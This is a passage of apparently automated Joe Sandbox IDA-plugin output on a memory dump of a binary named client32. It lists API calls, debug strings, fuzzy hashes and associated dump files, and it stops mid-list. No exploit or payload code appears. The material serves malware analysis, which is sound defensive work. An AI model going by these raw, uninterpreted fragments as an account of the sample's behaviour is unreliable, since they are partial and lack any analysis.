                                                                                        • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                        • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                        • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                        • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 110334CA
                                                                                        • _memset.LIBCMT ref: 11033501
                                                                                        • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                        • GetLastError.KERNEL32 ref: 11033534
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • _memmove.LIBCMT ref: 1103357E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                        • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                        • API String ID: 2414640225-228067302
                                                                                        • Opcode ID: a19d5f5c75181924209bb5725fee625b82b0ff7eabefb99c374a3dbc6f3336af
                                                                                        • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                        • Opcode Fuzzy Hash: a19d5f5c75181924209bb5725fee625b82b0ff7eabefb99c374a3dbc6f3336af
                                                                                        • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                        • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                        • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                        • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                        • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Sleep
                                                                                        • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                        • API String ID: 4250438611-314227603
                                                                                        • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                        • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                        • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                        • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                        APIs
                                                                                        • _strncmp.LIBCMT ref: 1100953A
                                                                                        • _strncmp.LIBCMT ref: 1100954A
                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110095EB
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                        • IsA(), xrefs: 110095A5, 110095CD
                                                                                        • https://, xrefs: 1100952F
                                                                                        • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                        • http://, xrefs: 11009535, 11009548
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strncmp$FileWrite
                                                                                        • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                        • API String ID: 1635020204-3154135529
                                                                                        • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                        • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                        • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                        • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                        APIs
                                                                                        • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                        • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                        • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                        • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                        • PostMessageA.USER32 ref: 110274F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Item$ClassMessageNamePostTextWindow
                                                                                        • String ID: #32770$Tapiexe
                                                                                        • API String ID: 3170390011-3313516769
                                                                                        • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                        • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                        • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                        • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                        APIs
                                                                                        • GetDlgItemTextA.USER32 ref: 110233C2
                                                                                          • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                        • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                        • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                        • SetFocus.USER32 ref: 11023417
                                                                                        • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                        • API String ID: 1605826578-1986719024
                                                                                        • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                        • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                        • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                        • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 74472576-4108050209
                                                                                        • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                        • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                        • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                        • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?,B24479DC,750A7F69,750A7D59,?,750A7F69,750A7D59), ref: 11071824
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$Y}u$Y}u$queue$r->queue != queue
                                                                                        • API String ID: 624642848-515044961
                                                                                        • Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                        • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                                        • Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                        • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 11119C67
                                                                                        • MapWindowPoints.USER32 ref: 11119C79
                                                                                        • GetSystemMetrics.USER32(00000002), ref: 11119C87
                                                                                        • GetSystemMetrics.USER32(00000003), ref: 11119C9F
                                                                                        • GetSystemMetrics.USER32(0000004E), ref: 11119CEE
                                                                                        • GetSystemMetrics.USER32(0000004F), ref: 11119CF8
                                                                                        • GetSystemMetrics.USER32(00000000), ref: 11119D0B
                                                                                        • GetSystemMetrics.USER32(00000001), ref: 11119D1E
                                                                                        • GetWindowRect.USER32(?,?), ref: 11119D8B
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5
                                                                                          • Part of subcall function 11095920: _memset.LIBCMT ref: 1109594F
                                                                                          • Part of subcall function 11095920: FreeLibrary.KERNEL32(00000000,?,75097D2F,11119E07,00000002), ref: 1109595A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
                                                                                        • String ID:
                                                                                        • API String ID: 314733930-0
                                                                                        • Opcode ID: ffbe80ec5c7be6277551f47d8a5d3bcbf3a975e34dc442d0e2f93cbdde94097c
                                                                                        • Instruction ID: 481f58b58db7c1b22ecc32cf71a8a36d2796d8213e8680ad797dec510adba49f
                                                                                        • Opcode Fuzzy Hash: ffbe80ec5c7be6277551f47d8a5d3bcbf3a975e34dc442d0e2f93cbdde94097c
                                                                                        • Instruction Fuzzy Hash: B4611D71D0065A9FDB24CF64C984BEDF7F5FB48704F0045AAD91AA7284EB74AA84CF90
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 11037BA7
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • _free.LIBCMT ref: 11037BCF
                                                                                        • _strncpy.LIBCMT ref: 11037BFB
                                                                                        • _strncpy.LIBCMT ref: 11037C38
                                                                                        • _malloc.LIBCMT ref: 11037C72
                                                                                        • _strncpy.LIBCMT ref: 11037C83
                                                                                        • _strncpy.LIBCMT ref: 11037CC3
                                                                                        • _malloc.LIBCMT ref: 11037CF6
                                                                                        • _strncpy.LIBCMT ref: 11037D0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 1102513549-0
                                                                                        • Opcode ID: 2f1df1e0c88086c9e96fbe33b0170e747102270d287f4437fe11e8fda7f8ecdb
                                                                                        • Instruction ID: 0993799ff6b1df3d5f9af4c11cbbccce243fc3b3dc02a8004556a834a5a0d823
                                                                                        • Opcode Fuzzy Hash: 2f1df1e0c88086c9e96fbe33b0170e747102270d287f4437fe11e8fda7f8ecdb
                                                                                        • Instruction Fuzzy Hash: BC5176B5D142259FDB20DFB8CD84BCABBBCEF15308F004195958897240EBB5A995CFE1
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 11039768
                                                                                        • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                                        • PostMessageA.USER32 ref: 110397A5
                                                                                        • GetParent.USER32(?), ref: 110397B6
                                                                                        • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                                        • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
